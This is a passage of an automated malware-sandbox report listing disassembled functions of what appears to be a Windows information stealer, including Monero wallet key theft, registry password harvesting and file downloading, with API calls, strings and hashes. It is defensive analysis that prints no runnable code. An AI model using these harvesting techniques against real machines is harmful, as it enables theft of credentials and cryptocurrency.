                                                                                            • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040134F
                                                                                          • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                          • lstrcat.KERNEL32(?,.keys), ref: 00401377
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00418600: GetSystemTime.KERNEL32(?,007F1C10,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                            • Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                            • Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                            • Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                            • Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                            • Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                          • memset.MSVCRT ref: 00401516
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                          • API String ID: 1930502592-218353709
                                                                                          • Opcode ID: fd13a5bf35781070aacd445d09fd412eb75f4d8fb20893014472706d679c0f3e
                                                                                          • Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
                                                                                          • Opcode Fuzzy Hash: fd13a5bf35781070aacd445d09fd412eb75f4d8fb20893014472706d679c0f3e
                                                                                          • Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA
                                                                                          Function 004060F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                            • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                            • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                          • InternetOpenA.WININET(00420DE2,00000001,00000000,00000000,00000000), ref: 0040615F
                                                                                          • StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00406197
                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                                                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                                                                          • InternetReadFile.WININET(q&A,?,00000400,?), ref: 0040622C
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                                                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                                                                          • InternetCloseHandle.WININET(q&A), ref: 004062A3
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                          • String ID: q&A$q&A
                                                                                          • API String ID: 2507841554-3681770271
                                                                                          • Opcode ID: 1a189af19a0918ddc1989b4224ad2285b48102a83fadce9624675bb6f0ae19fa
                                                                                          • Instruction ID: 439f38139d03757dc0e639f6b6df0271613160f362a72270d2c4ade6ce016e72
                                                                                          • Opcode Fuzzy Hash: 1a189af19a0918ddc1989b4224ad2285b48102a83fadce9624675bb6f0ae19fa
                                                                                          • Instruction Fuzzy Hash: C15161B1A00218ABDB20EF50CD49FEE7779AF44305F1081ADB606B71C1DB786A95CF99
                                                                                          Function 00407610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00407310: memset.MSVCRT ref: 00407354
                                                                                            • Part of subcall function 00407310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
                                                                                            • Part of subcall function 00407310: RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
                                                                                            • Part of subcall function 00407310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
                                                                                            • Part of subcall function 00407310: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
                                                                                            • Part of subcall function 00407310: HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499
                                                                                          • lstrcat.KERNEL32(334A4020,004217A0), ref: 00407646
                                                                                          • lstrcat.KERNEL32(334A4020,00000000), ref: 00407688
                                                                                          • lstrcat.KERNEL32(334A4020, : ), ref: 0040769A
                                                                                          • lstrcat.KERNEL32(334A4020,00000000), ref: 004076CF
                                                                                          • lstrcat.KERNEL32(334A4020,004217A8), ref: 004076E0
                                                                                          • lstrcat.KERNEL32(334A4020,00000000), ref: 00407713
                                                                                          • lstrcat.KERNEL32(334A4020,004217AC), ref: 0040772D
                                                                                          • task.LIBCPMTD ref: 0040773B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                          • String ID: :
                                                                                          • API String ID: 3191641157-3653984579
                                                                                          • Opcode ID: f979cf87b43af2eb7bb5905fc5edc651b4ca25bb004b27d4a2fbdc1bc65e463e
                                                                                          • Instruction ID: 05ed671df160738881f441edec20510396de118aefbcae7eba62044a73751e2f
                                                                                          • Opcode Fuzzy Hash: f979cf87b43af2eb7bb5905fc5edc651b4ca25bb004b27d4a2fbdc1bc65e463e
                                                                                          • Instruction Fuzzy Hash: FC318476D00509EBCB14EBA0DD45DEF7779AF94304F14402EF502772A0CA38A946CFA9
                                                                                          Function 00407310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00407354
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
                                                                                          • RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
                                                                                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499
                                                                                            • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                                                                          • task.LIBCPMTD ref: 00407595
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                          • String ID: Password
                                                                                          • API String ID: 2698061284-3434357891
                                                                                          • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
                                                                                          • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
                                                                                          • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
                                                                                          • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95
                                                                                          Function 00416FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004170AA
                                                                                          • wsprintfA.USER32 ref: 004170E0
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                          • String ID: :$C$\
                                                                                          • API String ID: 3790021787-3809124531
                                                                                          • Opcode ID: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
                                                                                          • Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
                                                                                          • Opcode Fuzzy Hash: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
                                                                                          • Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9
                                                                                          Function 00417BA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0081AE08,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0081AE08,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
                                                                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
                                                                                          • __aulldiv.LIBCMT ref: 00417C12
                                                                                          • __aulldiv.LIBCMT ref: 00417C20
                                                                                          • wsprintfA.USER32 ref: 00417C4C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                          • String ID: %d MB$@
                                                                                          • API String ID: 2886426298-3474575989
                                                                                          • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
                                                                                          • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
                                                                                          • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
                                                                                          • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
                                                                                          Function 00416B70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 00416B7E
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
                                                                                          • memset.MSVCRT ref: 00416C0A
                                                                                          • ??_V@YAXPAX@Z.MSVCRT ref: 00416D5E
                                                                                          Strings
                                                                                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenProcesslstrcpymemset
                                                                                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                          • API String ID: 224852652-4138519520
                                                                                          • Opcode ID: a2649502dd857f7a6f2c152c7032022c2e5ebb9aae8a7a6abff8c91a4bda3b7d
                                                                                          • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
                                                                                          • Opcode Fuzzy Hash: a2649502dd857f7a6f2c152c7032022c2e5ebb9aae8a7a6abff8c91a4bda3b7d
                                                                                          • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
                                                                                          Function 0040B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
                                                                                            • Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
                                                                                            • Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040BADD
                                                                                            • Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2
                                                                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BB0B
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040BBE3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040BBF7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
